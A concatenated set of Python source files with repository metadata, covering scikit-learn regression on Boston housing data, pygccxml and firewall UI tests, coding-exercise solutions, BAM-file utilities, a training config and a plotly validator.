import numpy as np
import pandas as pd
import matplotlib as mpl
import matplotlib.pyplot as plt
from sklearn import datasets
from sklearn.model_selection import train_test_split, GridSearchCV
from sklearn.linear_model import LinearRegression, LassoCV, RidgeCV, ElasticNetCV
from sklearn.linear_model.coordinate_descent import ConvergenceWarning
from sklearn.pipeline import Pipeline
from sklearn.preprocessing import PolynomialFeatures, StandardScaler
names = ['CRIM','ZN', 'INDUS','CHAS','NOX','RM','AGE','DIS','RAD','TAX','PTRATIO','B','LSTAT']
def notEmpty(s):
return s != ''
mpl.rcParams[u'font.sans-serif'] = [u'simHei']
mpl.rcParams[u'axes.unicode_minus'] = False
warnings.filterwarnings(action = 'ignore', category=ConvergenceWarning)
np.set_printoptions(linewidth=100, suppress=True)
df = pd.read_csv('../datas/boston_housing.data', header=None)
# print(df.values)
data = np.empty((len(df), 14))
for i, d in enumerate(df.values):
d = list(map(float,list(filter(notEmpty, d[0].split(' ')))))
data[i] = d
x, y = np.split(data, (13,), axis=1)
y = y.ravel()
# print('x:\t', x, type(x))
# print('y:\t', y, type(y))
print ("样本数据量:%d, 特征个数:%d" % x.shape)
print ("target样本数据量:%d" % y.shape[0])
models = [
Pipeline([
('ss', StandardScaler()),
('poly', PolynomialFeatures()),
('linear', RidgeCV(alphas=np.logspace(-3, 1, 20)))
]),
Pipeline([
('ss', StandardScaler()),
('poly', PolynomialFeatures()),
('linear', LassoCV(alphas=np.logspace(-3, 1, 20)))
])
]
x_train, x_test, y_train, y_test = train_test_split(x, y, test_size=0.2, random_state=0)
parameters = {
"poly__degree": [3,2,1],
"poly__interaction_only": [True, False],
"poly__include_bias": [True, False],
"linear__fit_intercept": [True, False]
}
titles = ['Ridge', 'Lasso']
colors = ['g-', 'b-']
plt.figure(figsize=(16, 8), facecolor='w')
ln_x_test = range(len(x_test))
plt.plot(ln_x_test, y_test, 'r-', lw=2, label=u'真实值')
for t in range(2):
model = GridSearchCV(models[t], param_grid=parameters, n_jobs=1)
model.fit(x_train, y_train)
print("%s算法:最优参数:" % titles[t], model.best_params_)
print("%s算法:R值=%.3f" % (titles[t], model.best_score_))
y_predict = model.predict(x_test)
plt.plot(ln_x_test, y_predict, colors[t], lw=t + 3, label=u'%s算法估计值,$R^2$=%.3f' % (titles[t], model.best_score_))
plt.legend(loc='upper left')
plt.grid(True)
plt.title(u"波士顿房屋价格预测")
plt.show() | [
"[email protected]"
]
| |
79ae6089ad6be6b58d2ffa5c5819cdeffca5037a | 5d6a464bcf381a44588d6a0a475f666bdc8b5f05 | /unittests/namespace_matcher_tester.py | a517fd7da3b64b22821666f82bf8e3b8183eb0f0 | [
"BSL-1.0",
"LicenseRef-scancode-unknown-license-reference"
]
| permissive | iMichka/pygccxml | d4f2ac032a742f1cd9c73876f6ba6a85d2047837 | f872d056f477ed2438cd22b422d60dc924469805 | refs/heads/develop | 2023-08-05T04:35:32.774634 | 2017-01-10T06:04:17 | 2017-01-10T06:04:17 | 45,710,813 | 0 | 2 | BSL-1.0 | 2023-08-20T21:02:24 | 2015-11-06T22:14:37 | Python | UTF-8 | Python | false | false | 2,084 | py | # Copyright 2014-2017 Insight Software Consortium.
# Copyright 2004-2009 Roman Yakovenko.
# Distributed under the Boost Software License, Version 1.0.
# See http://www.boost.org/LICENSE_1_0.txt
import unittest
import parser_test_case
from pygccxml import parser
from pygccxml import declarations
class Test(parser_test_case.parser_test_case_t):
COMPILATION_MODE = parser.COMPILATION_MODE.ALL_AT_ONCE
def __init__(self, *args):
parser_test_case.parser_test_case_t.__init__(self, *args)
self.header = 'bit_fields.hpp'
self.declarations = None
def setUp(self):
if not self.declarations:
self.declarations = parser.parse([self.header], self.config)
def test(self):
criteria = declarations.namespace_matcher_t(name='bit_fields')
declarations.matcher.get_single(criteria, self.declarations)
self.assertTrue(
str(criteria) == '(decl type==namespace_t) and (name==bit_fields)')
def test_allow_empty(self):
global_ns = declarations.get_global_namespace(self.declarations)
global_ns.init_optimizer()
self.assertTrue(
0 == len(global_ns.namespaces('does not exist', allow_empty=True)))
class unnamed_ns_tester_t(parser_test_case.parser_test_case_t):
COMPILATION_MODE = parser.COMPILATION_MODE.ALL_AT_ONCE
def __init__(self, *args):
parser_test_case.parser_test_case_t.__init__(self, *args)
self.header = 'unnamed_ns_bug.hpp'
self.declarations = None
def setUp(self):
if not self.declarations:
self.declarations = parser.parse([self.header], self.config)
def test(self):
declarations.matcher.get_single(
declarations.namespace_matcher_t(name='::'), self.declarations)
def create_suite():
suite = unittest.TestSuite()
suite.addTest(unittest.makeSuite(Test))
suite.addTest(unittest.makeSuite(unnamed_ns_tester_t))
return suite
def run_suite():
unittest.TextTestRunner(verbosity=2).run(create_suite())
if __name__ == "__main__":
run_suite()
| [
"[email protected]"
]
| |
b865747d25a963ea30d051c763b151966b68b592 | 667f153e47aec4ea345ea87591bc4f5d305b10bf | /Solutions/Ch1Ex032.py | 146193ba642a281f4a5d647a77ffee5e055d6028 | []
| no_license | Parshwa-P3/ThePythonWorkbook-Solutions | feb498783d05d0b4e5cbc6cd5961dd1e611f5f52 | 5694cb52e9e9eac2ab14b1a3dcb462cff8501393 | refs/heads/master | 2022-11-15T20:18:53.427665 | 2020-06-28T21:50:48 | 2020-06-28T21:50:48 | 275,670,813 | 1 | 0 | null | 2020-06-28T21:50:49 | 2020-06-28T21:26:01 | Python | UTF-8 | Python | false | false | 489 | py | # Ch1Ex032.py
# Author: Parshwa Patil
# ThePythonWorkbook Solutions
# Exercise No. 32
# Title: Sort three numbers
def main():
print("Enter numbers: ")
numbers = list(map(int, input().strip().split()))
for i in range(len(numbers) - 1):
for j in range(1, len(numbers)):
if numbers[j - 1] > numbers[j]:
numbers[j - 1], numbers[j] = numbers[j], numbers[j - 1]
print("Sorted: ")
for n in numbers: print(str(n) + " ", end="")
if __name__ == "__main__": main() | [
"[email protected]"
]
| |
11774cab8ab8b849d8287ce7a299505e8750722b | 555377aa073d24896d43d6d20d8f9f588d6c36b8 | /paleomix/common/bamfiles.py | 4b3c6c6f539923c279d04dea982a2307263c0bee | [
"MIT"
]
| permissive | jfy133/paleomix | 0688916c21051bb02b263e983d9b9efbe5af5215 | f7f687f6f69b2faedd247a1d289d28657710a8c2 | refs/heads/master | 2022-11-10T18:37:02.178614 | 2020-06-14T12:24:09 | 2020-06-14T12:24:09 | 270,936,768 | 0 | 0 | MIT | 2020-06-09T07:46:19 | 2020-06-09T07:46:18 | null | UTF-8 | Python | false | false | 4,837 | py | #!/usr/bin/python
#
# Copyright (c) 2012 Mikkel Schubert <[email protected]>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
#
import itertools
# BAM flags as defined in the BAM specification
BAM_SUPPLEMENTARY_ALIGNMENT = 0x800
BAM_PCR_DUPLICATE = 0x400
BAM_QUALITY_CONTROL_FAILED = 0x200
BAM_SECONDARY_ALIGNMENT = 0x100
BAM_IS_LAST_SEGMENT = 0x80
BAM_IS_FIRST_SEGMENT = 0x40
BAM_NEXT_IS_REVERSED = 0x20
BAM_READ_IS_REVERSED = 0x10
BAM_NEXT_IS_UNMAPPED = 0x8
BAM_READ_IS_UNMAPPED = 0x4
BAM_PROPER_SEGMENTS = 0x2
BAM_SEGMENTED = 0x1
# Default filters when processing reads
EXCLUDED_FLAGS = (
BAM_SUPPLEMENTARY_ALIGNMENT
| BAM_PCR_DUPLICATE
| BAM_QUALITY_CONTROL_FAILED
| BAM_SECONDARY_ALIGNMENT
| BAM_READ_IS_UNMAPPED
)
class BAMRegionsIter:
"""Iterates over a BAM file, yield a separate iterator for each contig
in the BAM or region in the list of regions if these are species, which in
turn iterates over individual positions. This allows for the following
pattern when parsing BAM files:
for region in BAMRegionsIter(handle):
# Setup per region
for (position, records) in region:
# Setup per position
...
# Teardown per position
# Teardown per region
The list of regions given to the iterator is expected to be in BED-like
records (see e.g. paleomix.common.bedtools), with these properties:
- contig: Name of the contig in the BED file
- start: 0-based offset for the start of the region
- end: 1-based offset (i.e. past-the-end) of the region
- name: The name of the region
"""
def __init__(self, handle, regions=None, exclude_flags=EXCLUDED_FLAGS):
"""
- handle: BAM file handle (c.f. module 'pysam')
- regions: List of BED-like regions (see above)
"""
self._handle = handle
self._regions = regions
self._excluded = exclude_flags
def __iter__(self):
if self._regions:
for region in self._regions:
records = self._handle.fetch(region.contig, region.start, region.end)
records = self._filter(records)
tid = self._handle.gettid(region.contig)
yield _BAMRegion(tid, records, region.name, region.start, region.end)
else:
def _by_tid(record):
"""Group by reference ID."""
return record.tid
# Save a copy, as these are properties generated upon every access!
names = self._handle.references
lengths = self._handle.lengths
records = self._filter(self._handle)
records = itertools.groupby(records, key=_by_tid)
for (tid, items) in records:
if tid >= 0:
name = names[tid]
length = lengths[tid]
else:
name = length = None
yield _BAMRegion(tid, items, name, 0, length)
def _filter(self, records):
"""Filters records by flags, if 'exclude_flags' is set."""
if self._excluded:
pred = lambda record: not record.flag & self._excluded
return filter(pred, records)
return records
class _BAMRegion:
"""Implements iteration over sites in a BAM file. It is assumed that the
BAM file is sorted, and that the input records are from one contig.
"""
def __init__(self, tid, records, name, start, end):
self._records = records
self.tid = tid
self.name = name
self.start = start
self.end = end
def __iter__(self):
def _by_pos(record):
"""Group by position."""
return record.pos
for group in itertools.groupby(self._records, _by_pos):
yield group
| [
"[email protected]"
]
| |
92ffd6bc7322742b3d8da89f9f43fec5692453de | 4554fcb85e4c8c33a5b5e68ab9f16c580afcab41 | /projecteuler/test_xiaobai_17.py | d9b6678e2bc92bba87fc83a8f6d9bb16ee3c82a9 | []
| no_license | xshen1122/Follow_Huang_Python | 12f4cebd8ddbc241a1c32cfa16288f059b530557 | fcea6d1361aa768fb286e1ef4a22d5c4d0026667 | refs/heads/master | 2021-01-01T04:37:31.081142 | 2017-12-05T07:31:34 | 2017-12-05T07:31:34 | 97,211,313 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,630 | py | # test_xiaobai_17.py
# coding: utf-8
'''
If the numbers 1 to 5 are written out in words: one, two, three, four, five, then there are 3 + 3 + 5 + 4 + 4 = 19 letters used in total.
If all the numbers from 1 to 1000 (one thousand) inclusive were written out in words, how many letters would be used?
'''
def getLetter(yourlist):
ss=''
for item in yourlist:
ss += item
return len(ss)
def getList(yourlist):
for item in one_digit[:-1]:
yourlist.append(yourlist[0]+item)
return yourlist
if __name__ == '__main__':
one_digit = ['one','two','three','four','five','six','seven','eight','nine','ten']
teenage_digit = ['eleven','twelve','thirteen','fourteen','fifteen','sixteen','seventeen','eighteen','nineteen']
twenty_digit = ['twenty']
thirty_digit = ['thirty']
forty_digit = ['forty']
fifty_digit = ['fifty']
sixty_digit = ['sixty']
seventy_digit = ['seventy']
eighty_digit = ['eighty']
ninety_digit = ['ninety']
hundred_digit = ['hundredand']
letter_list = []
letter_list.append(getLetter(one_digit))
letter_list.append(getLetter(getList(twenty_digit)))
letter_list.append(getLetter(getList(thirty_digit)))
letter_list.append(getLetter(getList(forty_digit)))
letter_list.append(getLetter(getList(fifty_digit)))
letter_list.append(getLetter(getList(sixty_digit)))
letter_list.append(getLetter(getList(seventy_digit)))
letter_list.append(getLetter(getList(eighty_digit)))
letter_list.append(getLetter(getList(ninety_digit)))
result = 0
for item in letter_list:
result += item
print result # 1-99 has 787 letters
# 100 - 199 has ??
#以下就按100-199,200-299, 900-999,1000来计数即可
| [
"[email protected]"
]
| |
db8694ebf7d5685301e2ad916517b43690b7ac20 | e2e08d7c97398a42e6554f913ee27340226994d9 | /pyautoTest-master(ICF-7.5.0)/test_case/scg/scg_LOG/test_c142881.py | 017398d281b068be2333be366936895d37d5e8d4 | []
| no_license | lizhuoya1111/Automated_testing_practice | 88e7be512e831d279324ad710946232377fb4c01 | b3a532d33ddeb8d01fff315bcd59b451befdef23 | refs/heads/master | 2022-12-04T08:19:29.806445 | 2020-08-14T03:51:20 | 2020-08-14T03:51:20 | 287,426,498 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,288 | py | import pytest
import time
import sys
from os.path import dirname, abspath
sys.path.insert(0, dirname(dirname(abspath(__file__))))
from page_obj.scg.scg_def_physical_interface import *
from page_obj.scg.scg_def_vlan_interface import *
from page_obj.scg.scg_def_bridge import *
from page_obj.common.rail import *
from page_obj.scg.scg_def_log import *
from page_obj.common.ssh import *
from page_obj.scg.scg_def_dhcp import *
from page_obj.scg.scg_dev import *
from page_obj.scg.scg_def_ifname_OEM import *
from page_obj.scg.scg_def import *
test_id = 142881
# 先产生安全日志 再删除
def test_c142881(browser):
try:
login_web(browser, url=dev1)
# 安全日志过滤级别改为all
edit_log_filter_lzy(browser, index="3", all='yes', debug='yes/no', info='yes/no', notice='yes/no',
warning='yes/no', error='yes/no', critical='yes/no', emerg='yes/no', alert="yes/no")
# IPMac绑定
add_ip_mac_binding_jyl(browser, ip="12.1.1.2", interface=interface_name_2, mac_add="auto_mac")
# 设置
edit_ip_mac_binding_rule_jyl(browser, interface=interface_name_2, source_mac_binding="enable",
policy_for_undefined_host="alert")
# 登录Dev2 修改2接口ip
sign_out_jyl(browser)
login_web(browser, url=dev2)
delete_physical_interface_ip_jyl(browser, interface=interface_name_2, ip="12.1.1.2")
add_physical_interface_static_ip_jyl(browser, interface=interface_name_2, ip='12.1.1.3', mask='24')
# 82 ping 12.1.1.1
sleep(1)
diag_ping(browser, ipadd="12.1.1.1", interface=interface_name_2)
# 登录Dev1
sign_out_jyl(browser)
login_web(browser, url=dev1)
# 获取安全日志总数 不为0
num2 = get_log_counts_lzy(browser, log_type=安全日志)
print(num2)
# 删除安全日志
delete_log(browser, log_type=安全日志)
# 获取安全日志总数为0
num1 = get_log_counts_lzy(browser, log_type=安全日志)
print(num1)
# 获取管理日志
log1 = get_log(browser, 管理日志)
# 还原
# 还原安全日志过滤级别error critical alert emerg
edit_log_filter_lzy(browser, index="3", all='yes/no', debug='yes/no', info='yes/no', notice='yes/no',
warning='yes/no', error='yes', critical='yes', emerg='yes', alert="yes")
# 删除IPMac绑定
delete_ip_mac_banding_jyl(browser, ip="12.1.1.2")
# 恢复IPMac设置
edit_ip_mac_binding_rule_jyl(browser, interface=interface_name_2, source_mac_binding="disenable",
policy_for_undefined_host="allow")
# 82 接口2改IP
sign_out_jyl(browser)
login_web(browser, url=dev2)
delete_physical_interface_ip_jyl(browser, interface=interface_name_2, ip="12.1.1.3")
add_physical_interface_static_ip_jyl(browser, interface=interface_name_2, ip='12.1.1.2', mask='24')
try:
assert "刪除日志成功" in log1 and num1 == 0 and num2 != 0
rail_pass(test_run_id, test_id)
except:
rail_fail(test_run_id, test_id)
assert "刪除日志成功" in log1 and num1 == 0 and num2 != 0
except Exception as err:
# 如果上面的步骤有报错,重新设备,恢复配置
print(err)
reload(hostip=dev1)
rail_fail(test_run_id, test_id)
assert False
if __name__ == '__main__':
pytest.main(["-v", "-s", "test_c" + str(test_id) + ".py"])
| [
"[email protected]"
]
| |
e917475fabe877dec477e34d78bf01e715efba8c | bcc199a7e71b97af6fbfd916d5a0e537369c04d9 | /leetcode/solved/2568_Minimum_Fuel_Cost_to_Report_to_the_Capital/solution.py | ff61ddbb440902ec03f8f9a1b947035f18fde637 | []
| no_license | sungminoh/algorithms | 9c647e82472905a2c4e505c810b622b734d9d20d | 1389a009a02e90e8700a7a00e0b7f797c129cdf4 | refs/heads/master | 2023-05-01T23:12:53.372060 | 2023-04-24T06:34:12 | 2023-04-24T06:34:12 | 87,406,513 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,604 | py | #! /usr/bin/env python
# -*- coding: utf-8 -*-
# vim:fenc=utf-8
#
# Copyright © 2020 sungminoh <[email protected]>
#
# Distributed under terms of the MIT license.
"""
There is a tree (i.e., a connected, undirected graph with no cycles) structure country network consisting of n cities numbered from 0 to n - 1 and exactly n - 1 roads. The capital city is city 0. You are given a 2D integer array roads where roads[i] = [ai, bi] denotes that there exists a bidirectional road connecting cities ai and bi.
There is a meeting for the representatives of each city. The meeting is in the capital city.
There is a car in each city. You are given an integer seats that indicates the number of seats in each car.
A representative can use the car in their city to travel or change the car and ride with another representative. The cost of traveling between two cities is one liter of fuel.
Return the minimum number of liters of fuel to reach the capital city.
Example 1:
Input: roads = [[0,1],[0,2],[0,3]], seats = 5
Output: 3
Explanation:
- Representative1 goes directly to the capital with 1 liter of fuel.
- Representative2 goes directly to the capital with 1 liter of fuel.
- Representative3 goes directly to the capital with 1 liter of fuel.
It costs 3 liters of fuel at minimum.
It can be proven that 3 is the minimum number of liters of fuel needed.
Example 2:
Input: roads = [[3,1],[3,2],[1,0],[0,4],[0,5],[4,6]], seats = 2
Output: 7
Explanation:
- Representative2 goes directly to city 3 with 1 liter of fuel.
- Representative2 and representative3 go together to city 1 with 1 liter of fuel.
- Representative2 and representative3 go together to the capital with 1 liter of fuel.
- Representative1 goes directly to the capital with 1 liter of fuel.
- Representative5 goes directly to the capital with 1 liter of fuel.
- Representative6 goes directly to city 4 with 1 liter of fuel.
- Representative4 and representative6 go together to the capital with 1 liter of fuel.
It costs 7 liters of fuel at minimum.
It can be proven that 7 is the minimum number of liters of fuel needed.
Example 3:
Input: roads = [], seats = 1
Output: 0
Explanation: No representatives need to travel to the capital city.
Constraints:
1 <= n <= 105
roads.length == n - 1
roads[i].length == 2
0 <= ai, bi < n
ai != bi
roads represents a valid tree.
1 <= seats <= 105
"""
from typing import List
import pytest
import sys
class Solution:
def minimumFuelCost(self, roads: List[List[int]], seats: int) -> int:
"""Mar 20, 2023 23:06"""
graph = {}
for a, b in roads:
graph.setdefault(a, set()).add(b)
graph.setdefault(b, set()).add(a)
def dfs(a, parent=None):
if a not in graph:
return 0, 0, 0
cars_total = 0
remainders_total = 1
cost_total = 0
for b in graph[a]:
if b == parent:
continue
cars, remainders, cost = dfs(b, a)
cars_total += cars
remainders_total += remainders
cost_total += cost + cars + min(remainders, 1)
c, r = divmod(remainders_total, seats)
cars_total += c
return cars_total, r, cost_total
return dfs(0)[2]
@pytest.mark.parametrize('args', [
(([[0,1],[0,2],[0,3]], 5, 3)),
(([[3,1],[3,2],[1,0],[0,4],[0,5],[4,6]], 2, 7)),
(([], 1, 0)),
])
def test(args):
assert args[-1] == Solution().minimumFuelCost(*args[:-1])
if __name__ == '__main__':
sys.exit(pytest.main(["-s", "-v"] + sys.argv))
| [
"[email protected]"
]
| |
0f6959e8b0cceca7092c8b800527680ba1e71b99 | 2bc8f66fd34ba1b93de82c67954a10f8b300b07e | /general_backbone/configs/image_clf_config.py | 278078f2ccad81f5d77ba37d852e540bba918d42 | []
| no_license | DoDucNhan/general_backbone | 7dabffed5a74e622ba23bf275358ca2d09faddc1 | 686c92ab811221d594816207d86a0b97c9b4bc73 | refs/heads/main | 2023-08-31T14:59:23.873555 | 2021-10-23T06:34:14 | 2021-10-23T06:34:14 | 420,419,141 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,926 | py | # Copyright (c) general_backbone. All rights reserved.
# --------------------Config for model training------------------------
train_conf = dict(
# General config
model='resnet18',
epochs=300,
start_epoch=0,
pretrained=True,
num_classes=2,
eval_metric='top1',
# Checkpoint
output='checkpoint/resnet50',
checkpoint_hist=10,
recovery_interval=10,
initial_checkpoint=None,
resume=None,
no_resume_opt=False,
# Logging
log_interval=50,
log_wandb=False,
local_rank=0,
# DataLoader
batch_size=16,
num_workers=8,
prefetch_factor=2,
pin_memory=True,
shuffle=True,
# Learning rate
lr=0.001,
lr_noise_pct=0.67,
lr_noise_std=1.0,
lr_cycle_mul=1.0,
lr_cycle_decay=0.1,
lr_cycle_limit=1.0,
sched='cosin',
min_lr=1e-6,
warmup_lr=0.0001,
warmup_epochs=5,
lr_k_decay=1.0,
decay_epochs=100,
decay_rate=0.1,
patience_epochs=10,
cooldown_epochs=10,
)
test_conf = dict(
# Data Loader
batch_size=16,
shuffle=False,
num_workers=8,
prefetch_factor=2,
pin_memory=True
)
# --------------------Config for Albumentation Transformation
# You can add to dict_transform a new Albumentation Transformation class with its argument and values:
# Learn about all Albumentation Transformations, refer to link: https://albumentations.ai/docs/getting_started/transforms_and_targets/
# Note: the order in the dictionary is matched with the processive order of transformations
data_root = 'toydata/image_classification'
img_size=224
data_conf=dict(
dict_transform=dict(
RandomResizedCrop={'width':256, 'height':256, 'scale':(0.9, 1.0), 'ratio':(0.9, 1.1), 'p':0.5},
ColorJitter={'brightness':0.35, 'contrast':0.5, 'saturation':0.5, 'hue':0.2, 'always_apply':False, 'p':0.5},
ShiftScaleRotate={'shift_limit':0.05, 'scale_limit':0.05, 'rotate_limit':15, 'p':0.5},
RGBShift={'r_shift_limit': 15, 'g_shift_limit': 15, 'b_shift_limit': 15, 'p': 0.5},
RandomBrightnessContrast={'p': 0.5},
Normalize={'mean':(0.485, 0.456, 0.406), 'std':(0.229, 0.224, 0.225)},
Resize={'height':img_size, 'width': img_size},
ToTensorV2={'always_apply':True}
),
class_2_idx=None, # Dictionary link class with indice. For example: {'dog':0, 'cat':1}, Take the folder name for label If None.
img_size=img_size,
data = dict(
train=dict(
data_dir=data_root,
name_split='train',
is_training=True,
debug=False, # If you want to debug Augumentation, turn into True
dir_debug = 'tmp/alb_img_debug', # Directory where to save Augmentation debug
shuffle=True
),
eval=dict(
data_dir=data_root,
name_split='test',
is_training=False,
shuffle=False
)
)
) | [
"[email protected]"
]
| |
5a380d07f579329852a0e83a874f250f2cbda60c | 1c2c5240222e48cf6ed617378b23ce12c7f69231 | /backend_pms/asgi.py | 3b584ad3f8d2261c6920ecad850891f9d554084d | []
| no_license | MayowaFunmi/pms_backend | 5537d642a76ce18205f4a40a84a52c0ebfb24d5b | 0ddc8a3718bf54dd5f30394ae18c70653634d79f | refs/heads/master | 2023-02-06T23:26:15.429155 | 2021-01-02T14:39:06 | 2021-01-02T14:39:06 | 322,831,233 | 0 | 0 | null | 2021-01-02T13:30:05 | 2020-12-19T11:26:19 | Python | UTF-8 | Python | false | false | 399 | py | """
ASGI config for backend_pms project.
It exposes the ASGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.1/howto/deployment/asgi/
"""
import os
from django.core.asgi import get_asgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'backend_pms.settings')
application = get_asgi_application()
| [
"[email protected]"
]
| |
bcd47c049189dca5af79f4d85687e6732a673dce | bfe5ab782ca4bb08433d70bdd142913d40a40a8d | /Codes/141) exercise27.py | 57d04640fbaad4771a75ad7ddec47a0b9a69418c | []
| no_license | akshat12000/Python-Run-And-Learn-Series | 533099d110f774f3c322c2922e25fdb1441a6a55 | 34a28d6c29795041a5933bcaff9cce75a256df15 | refs/heads/main | 2023-02-12T19:20:21.007883 | 2021-01-10T05:08:09 | 2021-01-10T05:08:09 | 327,510,362 | 0 | 3 | null | null | null | null | UTF-8 | Python | false | false | 697 | py | # Create a laptop class with attributes like brand name, model name, price
# Create two instance(object) of your laptop class
class Laptop:
def __init__(self,brand_name,model_name,price):
self.brand_name=brand_name
self.model_name=model_name
self.price=price
self.full_name=brand_name+' '+model_name # we can create an extra or less instance variables
l1=Laptop("HP","Pavilion",50000)
l2=Laptop("Dell","Inspiron",45000)
print(f"Brand Name: {l1.brand_name}, Model Name: {l1.model_name}, Price: {l1.price}, Full Name: {l1.full_name}")
print(f"Brand Name: {l2.brand_name}, Model Name: {l2.model_name}, Price: {l2.price}, Full Name: {l2.full_name}") | [
"[email protected]"
]
| |
6a63db375fbee64f04a063e3e15d6e9caff8ca94 | 0f20f3e02aa05b8e690190a96e92a524b211338f | /SW_Expert_Academy_02/String2.py | 142a9ff2f4c33454b306be6657fae7ebaa14028b | []
| no_license | HYEONAH-SONG/Algorithms | ec744b7e775a52ee0756cd5951185c30b09226d5 | c74ab3ef21a728dcd03459788aab2859560367e6 | refs/heads/master | 2023-07-18T14:41:48.360182 | 2021-09-03T13:41:23 | 2021-09-03T13:41:23 | 336,240,949 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 194 | py | # 문장을 구성하는 단어를 역순으로 출력하는 프로그램을 작성하라
sentence = input()
s_list = sentence.split(' ')
s_list.reverse()
for i in s_list:
print(i, end=' ') | [
"[email protected]"
]
| |
3c6efd3975b2933f360fcc57fa1d1394bdbdbcc0 | da8adef15efbdacda32b19196b391f63d5026e3a | /SistemasInteligentes/P4/main.py | e8b16e5345b6a927679fdea2c978a99fee08ce29 | []
| no_license | rubcuadra/MachineLearning | 05da95c1f800e6acbce97f6ca825bd7a41d806a6 | aa13dd007a7954d50586cca6dd413a04db18ef77 | refs/heads/master | 2021-03-19T17:33:14.080691 | 2018-10-19T23:43:27 | 2018-10-19T23:43:27 | 100,544,903 | 8 | 1 | null | null | null | null | UTF-8 | Python | false | false | 2,237 | py | from reversi_player import Agent
from reversi import ReversiBoard
from random import shuffle
_agent2 = None
def P1Turn(board, player): #Player
move = input('Enter your move: ')
return move
def P2Turn(board, player): #IA
return _agent2.getBestMovement(board, player)
#Nivel => Profundidad de busqueda
#Fichas => 0 Blancas, 1 Negras (Para la computadora)
#Inicia => 0 Computadora, 1 Contrario
def othello(nivel, fichas=1, inicio=1):
global _agent2
_agent2 = Agent(nivel) #Crear agente para P2
#P2 is the computer
board = ReversiBoard()
print("=== GAME STARTED ===")
print(f"{board.P2S} = Blacks")
print(f"{board.P1S} = Whites\n")
print(board)
#Who starts and set tokens
if inicio == 1:
order = ["P1","P2"]
turns = [P1Turn,P2Turn]
tokens = [board.P2,board.P1] if fichas == 0 else [board.P1,board.P2]
else:
order = ["P2","P1"]
turns = [P2Turn,P1Turn]
tokens = [board.P1,board.P2] if fichas == 0 else [board.P2,board.P1]
while not ReversiBoard.isGameOver(board):
for i in range(2):
P1Score = board.score( board.P1 )
P2Score = board.score( board.P2 )
print("Scores:\t",f"{board.P1S}:{P1Score}","\t",f"{board.P2S}:{P2Score}")
if board.canPlayerMove( tokens[i] ) :
print(f"{order[i]} turn, throwing {board.getSymbol(tokens[i])}")
while True:
move = turns[i]( ReversiBoard( board.value ) ,tokens[i])
if ReversiBoard.cellExists(move):
r = board.throw(tokens[i],move)
if len(r) > 0:
print(f"Selection: {move}")
board.doUpdate(tokens[i],r)
break
print("Wrong movement, try again")
print(board)
if P1Score == P2Score: print("TIE !!")
else: print(f"Winner is {board.P1S if P1Score>P2Score else board.P2S}")
if __name__ == '__main__':
level = 2 #Dificultad de la AI
npc = 0 #Fichas del P2(AI). 0 es Blancas
starts = 1 #0 => P2 (AI) empieza
othello(level,npc,starts) | [
"[email protected]"
]
| |
05423c174b31b915d1aa2e5c7e66eff20ca99cb2 | 735f4a6eb4e9c72dc664926ff8b42d02da9067f2 | /batch_four/session-3/simple_file_creation.py | e0e87709ebb33e6df3d688ad5803ce85956fee80 | []
| no_license | sopanshewale/python-datascience | 943b689d4264ad06f19c8039745ba6625d556282 | 0014b48d2397e16536731e1ee91e5e36f31e1ed9 | refs/heads/master | 2021-01-11T20:24:58.567677 | 2018-06-09T07:07:10 | 2018-06-09T07:07:10 | 79,097,836 | 2 | 3 | null | null | null | null | UTF-8 | Python | false | false | 157 | py | #!/usr/bin/python3
f = open ('simple_data.txt', 'w')
f.write("Hello to writing data into file")
f.write("Line ------2")
f.write("Line ------3")
f.close()
| [
"[email protected]"
]
| |
08614e6d097655c7c676a0336d9f847227e88e3d | 090a4e026addc9e78ed6118f09fd0d7d4d517857 | /validators/funnel/_marker.py | 475ac8c006ae087f0522dd87148fdf5d681678a6 | [
"MIT"
]
| permissive | wwwidonja/new_plotly | 0777365e53ea7d4b661880f1aa7859de19ed9b9a | 1bda35a438539a97c84a3ab3952e95e8848467bd | refs/heads/master | 2023-06-04T19:09:18.993538 | 2021-06-10T18:33:28 | 2021-06-10T18:33:28 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,407 | py | import _plotly_utils.basevalidators
class MarkerValidator(_plotly_utils.basevalidators.CompoundValidator):
def __init__(self, plotly_name="marker", parent_name="funnel", **kwargs):
super(MarkerValidator, self).__init__(
plotly_name=plotly_name,
parent_name=parent_name,
data_class_str=kwargs.pop("data_class_str", "Marker"),
data_docs=kwargs.pop(
"data_docs",
"""
autocolorscale
Determines whether the colorscale is a default
palette (`autocolorscale: true`) or the palette
determined by `marker.colorscale`. Has an
effect only if in `marker.color`is set to a
numerical array. In case `colorscale` is
unspecified or `autocolorscale` is true, the
default palette will be chosen according to
whether numbers in the `color` array are all
positive, all negative or mixed.
cauto
Determines whether or not the color domain is
computed with respect to the input data (here
in `marker.color`) or the bounds set in
`marker.cmin` and `marker.cmax` Has an effect
only if in `marker.color`is set to a numerical
array. Defaults to `false` when `marker.cmin`
and `marker.cmax` are set by the user.
cmax
Sets the upper bound of the color domain. Has
an effect only if in `marker.color`is set to a
numerical array. Value should have the same
units as in `marker.color` and if set,
`marker.cmin` must be set as well.
cmid
